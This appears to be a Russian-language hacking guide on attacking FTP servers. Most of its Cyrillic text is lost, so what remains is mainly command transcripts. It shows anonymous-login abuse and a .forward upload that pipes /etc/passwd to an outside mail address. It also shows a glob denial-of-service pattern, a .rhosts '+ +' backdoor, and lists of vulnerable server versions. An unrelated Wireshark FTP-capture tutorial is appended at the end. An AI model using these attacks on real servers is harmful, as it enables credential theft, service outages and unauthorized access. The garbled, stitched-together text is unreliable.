  FTP .   *,    -  ,     
 3   :
1)-        
2)         (           )
3)  
Exploit:ftpspy.c 


4)    FTP. 

1.   FTP. 

bash# ftp -n 
ftp> open victim.com 
Connected to victim.com 
220 victim.com FTP server ready. 
ftp> quote user ftp 
331 Guest login ok, send ident as password. 
ftp> quote cwd ~root 
530 Please login with USER and PASS. 
ftp> quote pass ftp 
230 Guest login ok, access restrictions apply. 
ftp> ls -al / (or whatever) 


2.   /etc/passwd . 
bash# cat myforward_file 
"cat /etc/passwd | /bin/mail hacker@mail.ru " 
bash# ftp victim.com 
Connected to victim.com 
220 victim FTP server ready 
Name (victim.com:hacker):ftp 
331 Guest login ok, send you e-mail as password. 
Password: 
230 Guest login ok, access restrictions apply. 
ftp> ls -l 
220 PORT command succesful. 
150 Opening ASCII mode data connection for '/bin/ls'.(192.168.1.1, 2335) (0 bytes) 
total 4 
dr-xr-xr-x 2 root operator 512 Feb 28 2000 bin 
dr-xr-xr-x 2 root operator 512 Sep 18 2000 etc 
drwxrwxrwt 13 root operator 1024 Jul 1 00:55 incoming 
drwxr-xr-x 3 root operator 512 Feb 19 10:25 pub 
226 Transfer complete. 
ftp>put myforward_file .forward 
ftp>quit 
bash# echo 'You a hacked' | mail ftp@victim.com 

      ftp,   .forward            /etc/passwd          . 

3. D.o.S   FTPd . 
bash-2.05$ ftp victim.com 
Connected to victim.com. 
220 victim.com FTP server (Version 6.00) ready. 
Name (victim.com:hacker): ftp 
331 Guest login ok, send your email address as password. 
Password: 
230- Welcome to victim.com FTP server! 
230 Guest login ok, access restrictions apply. 
Remote system type is UNIX. 
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*^C 
bash# ftp victim.com 
Error:425 Run out of memory 

  ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*            .       glob(); -     . 

  : 
FreeBSD 4.2 
OpenBSD 2.8 
NetBSD 1.5 
IRIX 6.5 
HP-UX 11.00 
Solaris 8 

4.      . [5] 
the-7 00:48:46 hanirc $ 50 ftp -d 127.0.0.1 
Connected to 127.0.0.1. 
220 the-7.net FTP server (Version 6.00LS) ready. 
Name (127.0.0.1:ab): test 
---> USER test 
331 Password required for test. 
Password: 
---> PASS XXXX 
230 User test logged in. 
---> SYST 
215 UNIX Type: L8 Version: BSD-199506 
Remote system type is UNIX. 
Using binary mode to transfer files. 
ftp> cd /roo? 
---> CWD /roo? 
250 CWD command successful. 
ftp> pwd 
---> PWD 
257 "/root" is current directory. 
ftp> dir ? 
---> PORT 127,0,0,1,193,69 
200 PORT command successful. 
---> LIST ? 
150 Opening ASCII mode data connection for '/bin/ls'. 
-rwxr-xr-x 1 ab user 497 Dec 20 2000 p 
226 Transfer complete. 
ftp> get ? 
local: ? remote: ? 
---> TYPE I 
200 Type set to I. 
---> SIZE ? 
213 497 
---> PORT 127,0,0,1,193,70 
200 PORT command successful. 
---> RETR ? 
150 Opening BINARY mode data connection for 'p' (497 bytes). 
100% |**************************************************| 497 00:00 ETA 226 Transfer complete. 
497 bytes received in 0.00 seconds (1.66 MB/s) 
---> MDTM ? 
213 20001219211442 
ftp> 

5)  FTP . 

1.   

  FTP    ,    . ,          (,        ).   ,         .          "spoof" .   ,              . 

2.   
   ,       .  3-5     ,      421 ("Service not available, closing control connection."). ,   5-   ,   . 

         .    ,      .      DOS-. 


3. Privacy 
  ( )         FTP.    ,   FTP.      ,   . 


4.    
 FTP   530   USER,     .        , FTP  331.  ,       , FTP    331   USER. 

6)    FTP  . 

1.     CWD  LIST. PI-SOFT: SpoonFTP 1.0 

2.        .lnk-  ftp- (directory traversal) .     (.lnk)           FTP. 

ftp> PUT local.lnk remote.lnk 

WFTPD: WFTPD 3.0 
TRANSSOFT: Broker FTP 5.9 
ARGOSOFT: Argosoft FTP Server 1.2 
Bison FTP server V4R1 

3.    ftp-       (../). 

WHITSOFT: SlimServe FTP v1.0 
DATAWIZARD: FtpXQ Server 2.0 
TYPSOFT: TYPSoft FTP Server 0.85 
NETWIN: SurgeFTP 1.0 
WAR: WarFTPd 1.67 
PLAYSTATION2: RaidenFTPD 2.1 

4.       USER  PASSWORD . 

5. MS IIS 4.0 FTP Denial of Service Attack 

IIS 4.0  Denial of Service Attack. ,     .  : FTP     (    )    .   ,    PUT  GET-.    ()    "426 Connection closed; transfer aborted"          .   ,       -   FTP   ( )     (locking)      .     IIS`. 

5.     (permisions). 

Bash# ftp target.victim.com 
Connected to 666.666.666.666. 
220 target FTP server (Version wu-1.2(1) Mon Feb 30 18:04:42 EST 1995) ready. 
Name (666.666.666.666:hakd00d): ftp (or anonymous) 
331 Guest login ok, send your complete e-mail address as password. 
Password: 
230- 
230-Welcome to Victim Internet Services, Inc. 
230- 
230- 
230 Guest login ok, access restrictions apply. 
Remote system type is UNIX. 
Using binary mode to transfer files. 
ftp> ls -la 
200 PORT command successful. 
150 Opening ASCII mode data connection for /bin/ls. 
total 7704 
drwxrwxrwx 40 ftp other 8192 Jun 10 19:11 . 
drwxr-xr-x 40 root other 8192 Jun 10 19:11 .. 
lrwxrwxrwx 1 ftp other 8 May 24 12:19 1869 -> pub/1869 
drwxrwxrwx 4 root root 4096 May 23 02:05 pix.tar.gz 
lrwxrwxrwx 1 ftp other 8 May 24 12:19 idiot -> pub/idiot 

    ftp  .   : echo "+ +" > .rhosts 
              . 

 
  Wireshark.exe
               
(    1  2 =))
:
 

  Wireshark  Windows       .      WinPcap,       .         : 
TShark     ; 
Rawshark    ; 
Editcap  ,        ; 
Text2Pcap     HEX- ( )    Pcap; 
Mergecap         ; 
Capinfos        ; 
   . 
      .

 :
     ,    FTP  ,  ,       TLS      .   FTP   Cerberus FTP Server,      , , Internet Explorer (      Mozilla Firefox   FireFTP).
    Wireshark      FTP   ( ftp or ftp-data  ).        FTP : ftp://<IP  >   Enter.         test.txt,  .  ,    ,     .   8  ,      ,    ,     .

       .         FTP:         (    220-Welcome to Cerberus FTP Server),         USER  PASS,       LIST        RETR.  RETR       .     Ctrl+F,     Find by String  Search in Packet Bytes,     RETR   Enter.   ,       ,   ,     150 Opening data connection,         ( 9).

          TLS   .        AUTH TLS.       ,        .

